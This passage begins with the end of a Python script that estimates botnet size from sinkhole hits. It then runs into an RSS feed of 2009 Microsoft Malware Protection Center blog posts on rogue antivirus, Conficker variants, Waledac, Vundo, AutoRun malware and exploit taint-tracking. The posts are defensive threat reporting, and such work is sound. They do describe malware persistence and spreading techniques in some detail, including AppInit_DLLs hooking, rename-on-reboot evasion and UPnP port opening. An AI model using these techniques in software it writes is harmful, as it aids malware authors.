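    """Extrapolate the bot population from hosts that contacted m sinkholed URLs in one day."""
    return distinct_hosts_seen / hit_probability(m, n, k)


def appendix2_row(m, n=POOL, k=DRAW):
    """Percent chance to hit for m registered URLs, rounded like the post's table."""
    return round(100 * hit_probability(m, n, k), 2)


if __name__ == "__main__":
    for m in (1, 50, 100, 500):
        print(m, appendix2_row(m), round(100 * hit_probability_bound(m), 2))
    print("duplicates per draw:", round(expected_duplicates(), 4))
```

The bound is within a few hundredths of a percent of the exact value across the table, which is why the post can say the estimation "gives a pretty good idea"; the exact form is still cheap here because math.comb works on exact integers and the ratio is computed once.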
<item><title>Who's at Risk on the Internet Today We All Are Act Accordingly…</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center -

Here at the Microsoft Malware Protection Center (MMPC) we look for ways to share the valuable data, insights and expertise that we have with our customers on a regular basis. We just released the sixth volume of our Microsoft Security Intelligence Report (SIR). The SIR shares the conclusions drawn by our research team using data gathered from hundreds of millions of computers worldwide and some of the busiest services on the internet.

A very clear trend we saw in the second half of 2008 was the rise in prevalence of rogue security software (software which poses as anti-malware or anti-spyware protection but in reality does little or nothing, and may even be malware). The data also indicated that the number one threat we saw worldwide was Win32/Renos, a family of trojan downloaders and droppers that is used to distribute rogue security software; in the second half of 2008 we saw this threat increase in prevalence by 66.6%. We also saw a number of other rogue security software families increase in prevalence around the world, in different languages. Be careful out there. Get your software from a trusted source. You've heard it before. It's sound advice we want to pass along.

Here are a couple of other key findings from the report:

* The trojan downloaders and droppers and miscellaneous trojan categories of threat remain the most prevalent threats we see worldwide, making up more than 50% of all malware removed:
IMAGE
* The infection rates for newer operating systems, and later service pack combinations, are significantly better than those of their predecessors:
IMAGE
* Infection patterns vary between enterprise and home computer users: enterprise computer users (Forefront Client Security users) encounter more worms in their environment, whereas home computer users (Windows Live OneCare users) encounter more trojan threats:
IMAGE

Here are some resources that Microsoft has created to help you protect yourself from these threats:

* Again, use an up to date antimalware product from a known, trusted source, and keep it updated. Be cautious not to follow advertisements for unknown software that pretends to provide protection. Access the sites of the reputable vendors directly for information on or subscription to their products and services.
* If your antimalware software does not include antispyware software you should install a separate program and keep it updated. Windows Defender is included in Windows Vista, and is available as a free download for Windows XP users from http://www.microsoft.com/windows/products/winfamily/defender/default.mspx
* Install a firewall and keep it turned on.
* Always run up-to-date software. Enable Automatic Updates in Windows, which will ensure that the latest security updates from Microsoft are downloaded automatically. Periodically check the Web sites of third-party add-on vendors to ensure that you have the latest security updates for their software.
* Use caution when you click on links in e-mail or on social networking sites.
* More information and guidance on rogue security software can be found at http://www.microsoft.com/protect/computer/viruses/rogue.mspx

There is lots more data and analysis to be found in the SIR; read more by downloading the SIR and the Key Findings Summary.

Thanks,
Vinny Gullotto
General Manager, MMPC

IMAGE</description><link>http://www.secuobs.com/revue/news/89800.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89800.shtml</guid></item>
<item><title>Cashing in on Conficker's Bad Name</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Over the last couple of days we've seen some spam claiming to be from Microsoft, providing a free scan to remove Conficker. Here's an example:
[Image: misleading e-mail]
The link actually takes you to a typical fake online scanner page used to serve up a rogue security scanner. In this case the page tries to get you to download TrojanDownloader:Win32/Renos.HL, which in turn installs the rogue Trojan:Win32/WinSpywareProtect. You can read tips on how to recognize and avoid fraudulent e-mail.
--Hamish O'Dea</description><link>http://www.secuobs.com/revue/news/89799.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89799.shtml</guid></item>
<item><title>Win32/Conficker Variants Update</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - There have been new developments in the Conficker arena within the past couple of days. We would like to inform those who are concerned that the MMPC is working to make sure you have the information you need, first to be protected from any threat, and second, to provide you with a full understanding of the threat itself.

There have been primarily two new binaries reported. We are pleased to inform that Microsoft products such as Windows Live OneCare, Windows Live OneCare safety scanner, and the Forefront family of products were able to detect both of these newly reported binaries with existing signatures, no update required, as Worm:Win32/Conficker.D and Worm:Win32/Conficker.gen!A. Specific detections have been added for the new variants as Worm:Win32/Conficker.D and Worm:Win32/Conficker.E.

The first item (MD5: EB0787C5B388C685B406ED46AE077536 / SHA1: 4887AB470FF4E49BB5F7D01331F3DF16B2BB507B) was a minor change to the existing D variants. Existing signatures report this variation as Worm:Win32/Conficker.D. Minor differences found in this variation include:
Additions to the list of programs which will not be able to run on infected systems, programs with these substrings: bd_rem, cfremo, kill, stinger.
In addition, the following domain substrings are blocked: activescan, adware, av-sc, bdtools, mitre, ms-mvp, precisesecurity.
Of note are a number of security tools and sites that were prominent in the run up to April 1 that are no longer feasible if the prospective user is one who is infected by this version. To reiterate however, no updates or changes in posture are required by anyone who uses Microsoft tools.

The second newly discovered binary, one that is drawing attention in the media as E (MD5: 677daa8bf951ecce8eae7d7ee0301780 / SHA1: 879e553b472242f3ec5a7f9698bb44cad472ff3b), is still being dissected by our malware research lab, which is why I can be spared to write this rather than them. Existing signatures report this variation as Worm:Win32/Conficker.gen!A.

At first glance, this variant was considered a variant of A. And as fortune would have it, Microsoft products also were able to detect this new variant with existing signatures, no updates required. However, deeper analysis shows the following (reminder: we are continuing to research this), but the differences are significant enough that we will be designating this new variant as Conficker.E:
* Exploits MS08-067
* Contains code to spread via network shares
* Drops a driver similar to early variants, using the same mechanisms as Conficker.B
* Opens a web listener on a pseudo-random port between 1024 and 9999 based on the volume serial number of the system drive
* Appears to append a stream of randomly generated garbage to itself before offering itself for further propagation. This will result in untrustworthy file identification information like the ones I use above to inform other researchers as to the specific variant I am talking about; but our community can work its way around that
* Contains some of the same IP-filtering used in Conficker.D (don't go to certain IP ranges)
* Periodically connects to the following URLs to check for internet connectivity:
http://www.aol.com/
http://www.cnn.com/
http://www.ebay.com/
http://www.msn.com/
http://www.myspace.com/
* Periodically connects to one of the following sites at random to determine its external IP address:
http://checkip.dyndns.org
http://checkip.dyndns.com
http://www.myipaddress.com
http://www.findmyipaddress.com
http://www.ipaddressworld.com
http://www.findmyip.com
http://www.ipdragon.com
http://www.whatsmyipaddress.com
* Deletes itself on and after May 3rd 2009
* Uses SSDP to find Internet gateway devices (i.e. routers) and issues a SOAP command on the device to open an external TCP port and redirect it to an internal IP:port
* Does NOT appear to have the P2P protocol code. *Correction: drops a DLL component that contains P2P functionality

With all these differences, it is important to note a very key difference between the E variant and previous A-D variants. The E variant executes simultaneously with the existing Conficker.D already on that infected machine. So, for instance, not having the code to check URLs for updates is not significant as the machine is already doing that under Conficker.D's guidance. Same for the last note about the P2P protocol and other such things.

To keep abreast of developments regarding Conficker, please check http://www.microsoft.com/conficker. As we fill out the details on E, you will be able to find it here: http://www.microsoft.com/security/portal/Entry.aspx?Name=Worm:Win32/Conficker.E
And if there is other significant or breaking news, we will be back with more information here, on our blog.

Lastly, the press is filling up with conjectures and theories on who and what else is associated with this activity. There are more layers yet to unravel. We would like to gather more evidence before commenting on those thoughts.

My thanks to Aaron Putnam, Vincent Tiu, and Cristian Craioveanu as they continue peeling apart the layers of this onion.
-- Jimmy Kuo
PS: My heart-felt wishes for everyone to have a good Friday.</description><link>http://www.secuobs.com/revue/news/89798.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89798.shtml</guid></item>
<item><title>Yes, SIR, More Rogues</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - As Vinny mentioned in his post, the data in our recently released Microsoft Security Intelligence Report (SIR) clearly shows what we've been seeing in our day-to-day research over the last six months or so: rogue security software is getting more prevalent. As well as the raw data, the SIR includes some of our research into how rogues evolved over the second half of 2008. In addition to becoming more widespread, we saw rogues get more sophisticated and aggressive.

There were two families that really exemplified the state of rogues in 2H08: Win32/FakeSecSen and Win32/FakeXPA. These rogues were found on over 1.5 million computers each over the six month period.

Win32/FakeSecSen cloaked itself in many disguises, with names like "MS Antivirus", "Vista Antivirus 2008" and "Windows Antivirus 2008", combined with user interfaces that often imitated the look of the Windows Security Center.

Win32/FakeXPA took this idea a step further, introducing a complete imitation of the Windows Security Center, tailored to the version of Windows it was run on, as well as fake "blue screen" crash messages, all of which insisted that the rogue (which called itself "Antivirus 2010" in some cases) should be registered.

Vinny talked about the number one threat we saw worldwide, Win32/Renos, a threat that was found on 4.4 million distinct computers. Behind this huge number was an increasingly sophisticated array of malware distribution techniques including spam, exploits targeting browsers and third party add-ons like Adobe Flash, and multiple levels of redirection through compromised web sites. These were often combined with social engineering techniques including fake online scanners and product pages that were increasingly convincing at selling the rogues as legitimate applications.

You can find more details on rogues in the SIR. In particular, it includes a description of the legal fight against the people who distribute these applications.
--Hamish O'Dea</description><link>http://www.secuobs.com/revue/news/89797.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89797.shtml</guid></item>
<item><title>Did You Say Malware? Where?</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Customers often look for information about malware that may affect them. For the last couple of years, we have shown that malware doesn't spread evenly across the globe, despite the global nature of the Internet. Threats that rely on social engineering are not equally effective in different parts of the world due to language barriers or cultural factors. Also, sometimes the malware spreads using exploits in applications which are themselves unevenly distributed around the world. The Microsoft Security Intelligence Report (SIR) volume 6, which was released last Wednesday, provides lots of information about these aspects. The following chart from the SIR compares the prevalence of different categories of malware and Potentially Unwanted Software in some of the world's biggest economies. The SIR provides examples for many of these differences. For example, it discusses the password stealers that spread using emails in Portuguese that target online users mostly in Brazil, where Portuguese is spoken.
[Figure 43: the threat landscape worldwide and in eight of the biggest economies]
The SIR also measures the infection rate around the world using the telemetry data we get from our different antimalware products, and in particular from the MSRT. Here's the global heatmap that we created using telemetry from this tool:
[Image: global infection-rate heatmap]
The SIR even provides the infection rate for 215 different countries and regions during the second half of 2008 (see page 134). Some of the countries/regions with the highest infection rates are Serbia and Montenegro, Russia, Brazil, Turkey and Spain, while some of the countries/regions with the lowest infection rates are Vietnam, Philippines, Macao SAR, Japan and Morocco:
[Figures 46 and 47: the lists of most infected and least infected countries]
In addition to that, the SIR includes specific analysis of the threat landscape during the second half of 2008 in the following countries: Australia, Brazil, Canada, France, Germany, Italy, Malaysia, Mexico, Norway, Russia, UK and the US. For example, in the US, several of the most prevalent families, Win32/Renos, Win32/FakeXPA, Win32/FakeSecSen, Win32/Antivirus2008 and Win32/Winfixer, are either rogue security software or malware that downloads such software. This type of threat has greatly increased during that period.
[Figure 122: the breakdown of threat categories in the US]
The document also examines the system locale of computers where various exploits happened, and the locations of servers that host malware, phishing or drive-by exploits. We even provided the distribution within the US for some of these cases.
So there's great information there that you might find useful. Here's the link: www.microsoft.com/SIR
Ziv Mador
Microsoft Malware Protection Center</description><link>http://www.secuobs.com/revue/news/89796.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89796.shtml</guid></item>
<item><title>Where's Waledac?</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - The family added to the April MSRT release is Win32/Waledac. If you haven't heard of the family before, there is a chance you may have seen some of the spam generated by Win32/Waledac in your inbox. We've blogged about some of the spam campaigns in the past, such as Fake Obama or the Valentine Devkit. The most recent spam campaign uses a fake "Reuters Terror Attack" themed lure.
[Image: fake Reuters Terror Attack spam]
Win32/Waledac is a complex spam bot. It also has the ability to download and execute arbitrary files, harvest email addresses from the local machine, perform denial of service attacks, proxy network traffic and sniff passwords. It leapt into the spotlight in December of 2008 as a result of a large Christmas holiday e-card spam campaign. A number of functional and superficial similarities with the infamous Nuwar spambot (aka the "Storm" worm) led many to conclude, correctly, that Waledac was the next generation implementation. So where did Waledac come from?

The first variant which drew the attention of the MMPC was found nearly nine months prior to this event, in the first week of April 2008. This early version of Waledac was disseminated via the very mechanism which also delivered Nuwar to a machine. Interestingly, the same mechanism was also employed during the development of the Nuwar constituent components. The earliest record of the Waledac developmental "cross-grade" that the MMPC was able to establish was the 25th December 2007. This demonstrates that Waledac was in development for at least one year before the Christmas "show".
[Image: an early variant of Waledac, demonstrating the family name derivation]
Waledac employs an 'affiliate' (or partner, if you will) based installation scheme. For example, the MMPC has observed malware such as Win32/Bredolab download and install Waledac. Bredolab is notorious for installing prevalent spam bots such as Rustock, Cutwail, Srizbi, Tedroo and Rlsloup.

A simple reminder to exercise caution with links to web pages that you receive from unknown sources, especially if the links are to a Web page that you are not familiar with, unsure of the destination of, or suspicious of. Websites hosting Waledac have employed browser exploits, so malicious software may be installed on your system simply by visiting a Web page with harmful content.

We'll keep you posted as more information comes to hand.
--Scott Molenkamp</description><link>http://www.secuobs.com/revue/news/89795.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89795.shtml</guid></item>
<item><title>An Introduction to MMPC's Paladin Automated Vulnerability Analysis</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Paladin describes a set of internal tools that automate the steps a researcher would take to understand how a given exploit takes advantage of a given vulnerability. As of today, these tools are not for public consumption.

These tools take as input a vulnerable program and an exploit. The tools run the exploit against the vulnerable program and generate an output file. This output file characterizes how the exploit puts the vulnerable program into a malicious state.

A vulnerable program is in a malicious state when an exploit:
1. supplies an argument to a critical function like exec,
2. directs the program counter to execute code of the exploit's choosing,
3. overwrites memory so the program counter executes the exploit code itself,
4. causes an exception forcing the program to terminate.
These four states encompass a large set of how vulnerabilities in software are exploited.

Our automated vulnerability analysis tools are composed of a binary translator and a data flow tracker. The binary translator works with the data flow tracker to dynamically track the exploit bytes entering a vulnerable program's address space and propagating throughout the address space during program execution. Whenever these exploit bytes are used to produce one of the four above conditions, execution is halted and automated analysis is complete.

An example: a stack based overflow in an Image Viewer program occurs when a field in an image file exceeds a fixed sized buffer limit. The interesting portions of the characterizing output log of this Image Viewer vulnerability are as follows:

1. The initial tracking of the exploit as it enters the program space of Image Viewer. The Image Viewer program opens up the malicious file to render. The log file records the system call used to open up the file and then keeps track of the file contents by setting a range of taint values in the data flow tracker.
NtCreateFile: C:\POC\poc.emf
SetTaint: Base=9c608 Len=2a8
Range 9c608-9c8af set to = 2..2a9

2. Next, as the Image Viewer program is operating on the contents of the graphics file poc.emf, the data flow tracker propagates the initial taint in its internal data structures to mirror what is happening in the Image Viewer program space. Any x86 instruction that moves the exploit bytes to different locations in memory or registers is recorded into the log file. Below is a move instruction which transfers bytes 0x6 through 0x9 of the poc.emf file from a location in memory into the ecx register.
Mov rm32, rm32
EIP: 0x4eca6c71 ESP: 0x23efc64 TID: 0x768
Op1: 0x4 Dirty: 0x6, 0x7, 0x8, 0x9
Op2: 0x23efd2c Dirty: 0x6, 0x7, 0x8, 0x9

3. When the Image Viewer program succumbs to one of the four above states an alert is generated, execution is stopped and the log file is closed.
Alert dirty jmp/call pointer at EIP 0x77f20ffe
PosR10: 0x0, PosR11: 0x0, PosR12: 0x0, PosR13: 0x0
PosR20: 0x8a, PosR21: 0x8b, PosR22: 0x8c, PosR23: 0x8d
0x8a describes the offset in poc.emf whose bytes influenced the program counter. This is a malicious condition because the program counter of the Image Viewer program has been hijacked by the exploit. The program counter points to a location defined by the exploit.

The automatically generated log file provides the following information to the researcher:
1. How the exploit was received into the vulnerable program's address space.
2. In what manner the exploit compromised the vulnerable program. Specifically, what bytes in the exploit led to a compromised state.
3. The path from the initial receipt of the exploit to the point of compromise.
4. Whether two separate exploits are identical in terms of exploiting the same vulnerability in the same manner.

To obtain the above information in a matter of seconds is a large win for a researcher and just part of an arsenal of tools that will deliver scalable automated vulnerability analysis.
- MMPC Vulnerability Response Team</description><link>http://www.secuobs.com/revue/news/89794.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89794.shtml</guid></item>
<item><title>Threats at Home and at Work</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - It's pretty obvious that people often behave differently at home and at work. Microsoft has found that malware and potentially unwanted software are encountered differently and act differently in the two environments.

The following graph shows the difference between the categories of threats encountered by Windows Live OneCare users, which is for home use, and Forefront Client Security, which is designed to be managed at work. At work, computers are more likely to encounter self-replicating threats like worms that can capitalize on the highly interconnected computers. At home, threats are more likely to use social engineering and Trojan horse trickery or browser-based exploits.
[SIR graph: OneCare vs. FCS threat categories]
The top 10 threat families reported by Windows Live OneCare in the last six months of 2008 is dominated by Trojan threats. Among these are two rogue threats, FakeXPA and Antivirus2008, and the Renos family that may deliver these rogues. We use our home computers for more web browsing and entertainment than at work, and threats affecting home machines often employ tricky techniques called "social engineering" to infect machines.
[SIR graph: OneCare top 10 families]
At work, self-replicating worms dominate the list. Most computers at work are connected to a network with lots of other computers, and this trusted network gives a worm that infects a single machine a chance to spread all over the network. Perhaps most interesting on this list are the Taterf and Frethog families; these steal gaming passwords, which they probably aren't finding too many of at work. However, because of the way they spread, they're more successful in moving around enterprises than home machines.
[SIR graph: FCS top 10 families]
The notorious Conficker worm is similarly very dangerous at work, while being far more rare on home computers.

Luckily, some of the same protection steps work both at home and at work: update all your software to the latest, most secure versions, and run an up-to-date antivirus solution. Threats love exploiting vulnerabilities to take over computers that have no antivirus and aren't up-to-date on their patches.

Please read the latest Microsoft Security Intelligence Report at www.microsoft.com/SIR for more details on the difference between home and work threats.
--Joe Faulhaber</description><link>http://www.secuobs.com/revue/news/89793.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89793.shtml</guid></item>
<item><title>MSRT and MMPC in 2H08 – Microsoft Security Intelligence Report</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - The MSRT added the following threat families in 2H08. Rogues and botnet malware were the focus during the six months.

New Family     | Note                    | Added in  | Computers Cleaned by the MSRT in 2H08
Win32/Horst    | CAPTCHA breaking threat | July      | 235,318
Win32/Matcash  | Downloader              | August    | 217,610
Win32/Slenfbot | IRC bot                 | September | 598,178
Win32/Rustock  | Rootkit spam bot        | October   | 183,858
Win32/FakeSecSen | Rogue AV              | November  | 1,205,329
Win32/FakeXPA  | Rogue AV                | December  | 460,931
Win32/Yektel   | Rogue AV                | December  | 201,635

This cleaning tool is deployed to 450 million Windows machines every month through Windows Update (WU) and Automated Update (AU). It is one of the major data sources for the Security Intelligence Report (SIR). At Microsoft, when it comes to deciding what new threat families are to be included in the MSRT, we analyze the threat prevalence and the impact to the ecosystem, to the Windows users and to our partners. In 2009 we added Banload, Conficker, Srizbi, Koobface and Waledac to the MSRT. We also take requests from our colleagues in the industry, as Jeff Williams mentioned in his Koobface blog where the recent cooperation with Facebook was a good success.

MSRT is not the only data source for the SIR. Combining MSRT with other Microsoft products and tools, Microsoft observed the following top 25 threat families worldwide. Besides the rogue related threat families, online game password stealers (PWS) are also very notable on the list: Taterf, Frethog, Lolyda and Tilcun are all game PWS.
[Image: top 25 threat families worldwide]
For more information about malware and potentially unwanted software, or other Microsoft security intelligence, please visit www.microsoft.com/SIR
--Scott Wu</description><link>http://www.secuobs.com/revue/news/89792.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89792.shtml</guid></item>
<item><title>Malware Distribution Across Operating Systems</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Depending on your background, you may find different sections of the newly published Microsoft Security Intelligence Report (SIR) to be of more interest. In today's post, we would like to highlight the section on infection rates based on the operating system (OS) version and the service pack level. Microsoft has consistently observed that machines with a newer OS and with more recent service packs are less likely to be infected by malware. The graph below shows the number of computers having malware removed per 1,000 executions of the MSRT on that OS/SP during the second half of 2008 (2H08).
[Image: infection rate per 1,000 MSRT executions by OS/SP, 2H08]
In the SIR, you will find the following conclusions based on this data:
* The infection rate for Windows Vista is significantly lower than that of its predecessor, Windows XP, in all configurations.
* Comparing the latest service packs for each version, the infection rate of Windows Vista SP1 is 60.6 percent less than that of Windows XP SP3.
* Comparing the RTM versions of these operating systems, the infection rate of the RTM version of Windows Vista is 89.1 percent less than that of the RTM version of Windows XP.
* The infection rate of Windows Server 2008 RTM is 52.6 percent less than that of its predecessor, Windows Server 2003 SP2.
* The higher the service pack level, the lower the rate of infection. This trend can be observed consistently across client and server operating systems. There are two reasons for this:
  * Service packs include all previously released security updates. They can also include additional security features, mitigations, or changes to default settings to protect users.
  * Users who install service packs generally maintain their computers better than users who do not install service packs and may also be more cautious in the way they browse the Internet, open attachments, and engage in other activities that can open computers to attack.
* Server versions of Windows typically display a lower infection rate on average than client versions. Servers tend to have a lower effective attack surface than computers running client operating systems, as they are more likely to be used under controlled conditions by trained administrators and to be protected by one or more layers of security. In particular, Windows Server 2003 and its successors are hardened against attack in a number of ways, reflecting this difference in usage.

This data shows that regularly deploying service packs can help reduce the risk of malware, and deploying newer versions of the operating system can help further reduce the infection rate. We hope this information is useful for you.
Scott Wu</description><link>http://www.secuobs.com/revue/news/89791.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89791.shtml</guid></item>
<item><title>Vundo Employs Worm Behavior</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - Vundo is a malware family that doesn't need any introduction. It was one of the families added into the MSRT and remains in the top 10 detections every month.

It is commonly reported as a nuisance due to the incessant popups that it delivers to the user desktop, mostly related to rogue programs, slowing down the user's internet connection considerably.

Vundo is well known for its resistance to removal by most anti-virus products. One of the methods it uses is hooking the AppInit_DLLs, or LoadAppInit_DLLs for Windows Vista operating systems. This will cause every process using user32.dll (and which doesn't?) to load the dlls listed in this registry key into the process memory. Another trick it uses is to add itself to the PendingFileRenameOperations registry key. This basically marks the dll to be renamed to another random name upon reboot. So if the file was marked to be deleted by an AV product, for example, upon reboot it would have been renamed and would not be deleted. You'll be happy to know that our products are able to mitigate all these tricks.

Recently, we found new variants that employ replicating behavior by copying themselves to mapped drives on the infected machine. It either copies itself into the mapped drive's root directory as a random dll name, or it creates a random directory name and copies the dll in there with the same name. This variant is named Worm:Win32/Vundo.A. We often advise customers to clean machines infected with Vundo offline and reboot afterwards, because the process in memory can download the file again even if the malware was deleted successfully. Given this new behavior, if you think that you're infected with a new variant of Vundo, try disconnecting from the network before scanning your system.
--Jaime Wong</description><link>http://www.secuobs.com/revue/news/89790.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89790.shtml</guid></item>
<item><title>DOTA Players 0wn3d</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - --Rdy all--
--Mode -AP--
--Starting in 5--
--4--
--3--
--2--
--1--
This is the typical scene in DOTA before a game starts.

DOTA (Defense of the Ancients) is a very popular custom-made scenario map for Warcraft III. Popular enough that there is even a hit song named after it.

DOTA is usually played online with two teams against each other, with at most five players on each side. Each player selects from a range of heroes with unique skills. The goal of the game is to destroy the opponent's base. Even though this is not an MMORPG game, hundreds of thousands of players are still hooked on this game.

Because of its popularity, a lot of cheats, including map hacks, emerged. Map hacks in DOTA are cheat programs that enable the player to see everyone, including opponents, in the game. A player who wants to cheat would typically search for map hacks so as to have an advantage in the game. DOTA hot keys are programs used to save combinations of key strokes. They are popular because in the game it is an advantage to be able to press certain key combinations faster and with greater accuracy.

Nowadays, even DOTA is targeted by malware writers through social engineering. We recently found several samples relating to DOTA: some mimicking the Warcraft III Frozen Throne icon, others pretending to be DOTA map hacks and even hot keys. Malware that we have found related to DOTA are usually log sniffers and backdoor trojans belonging to the TrojanSpy:Win32/Logsnif and Backdoor:Win32/PcClient families.

Ironic that downloading programs that allow you to cheat in a game may result in a hacker cheating you out of something more valuable.

Play fair, play safe.
GL and HF (Good Luck and Have Fun)
--Francis and Elda</description><link>http://www.secuobs.com/revue/news/89789.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89789.shtml</guid></item>
<item><title>Windows Addresses the Changing AutoRun Threat Environment</title><description>Secuobs.com : 2009-04-29 12:57:24 - Microsoft Malware Protection Center - AutoRun is the ability for a device, through the use of autorun.inf, to expose a set of tasks for the user to choose upon insertion of new media into the computer. This could be a USB drive, a CD or DVD, a network drive, or any other addition of new media. The user is shown the AutoRun tasks along with other functions via the AutoPlay dialog.

About a decade ago, diskette use started to wane. Machines began to not include diskette drives anymore, and diskette viruses were effectively removed from the malware landscape. Today, USB media have appeared and are taking on the same role. In today's malware landscape, AutoRun malware has dramatically increased in popularity. The following chart highlights the increase in the number of different malware samples we have come across in our lab that are detected as Worm:Win32/Autorun:
[Image: Worm:Win32/Autorun samples per quarter]
Each quarter, we deal with close to a quarter million such samples.

Additionally, the WildList Organization (WLO) produces a monthly list of viruses confirmed to be spreading among worldwide users. Their count of Worm:Win32/Autorun confirmed samples also shows a significant increase.
[Image: WLO count of confirmed Worm:Win32/Autorun samples]
The numbers are smaller because the WLO has to collect, coordinate, and validate disparate contributions from many different vendors and only lists those confirmed by more than one industry contributor. But the dramatic rise is the same.

The recent Conficker worm is another of the many AutoRun pieces of malware that use this infection vector. It uses the additional concept of AutoPlay to confuse users and trick them into picking the incorrect option. Without closely studying the difference between the two choices, there is the possibility that users will select the first choice, which executes a copy of the worm.
[Image: AutoPlay dialog with the misleading Conficker entry]
So, due to this rise in malware usage of the AutoRun system, the Windows 7 team has undertaken a dramatic step to block this specific threat. The new changes will no longer expose the AutoRun entries in the dialog unless it is removable optical media (CD/DVDs). So, if a USB drive is inserted into a machine, the AutoRun choice will no longer be shown. In addition, changes have been implemented to help clarify actions about to be undertaken by the AutoPlay dialog.

We encourage you to update your systems to take advantage of this new functionality. We also hope AutoRun malware succumbs to this change in basic computer architecture, much as diskette viruses were defeated by the change in user habits.

To read more about the details of this new implementation, please see Engineering Windows 7: Improvements to AutoPlay.
-- Jimmy Kuo and Huzefa Mogri</description><link>http://www.secuobs.com/revue/news/89788.shtml</link><guid isPermaLink="false">http://www.secuobs.com/revue/news/89788.shtml</guid></item>
</channel>
</rss>
 
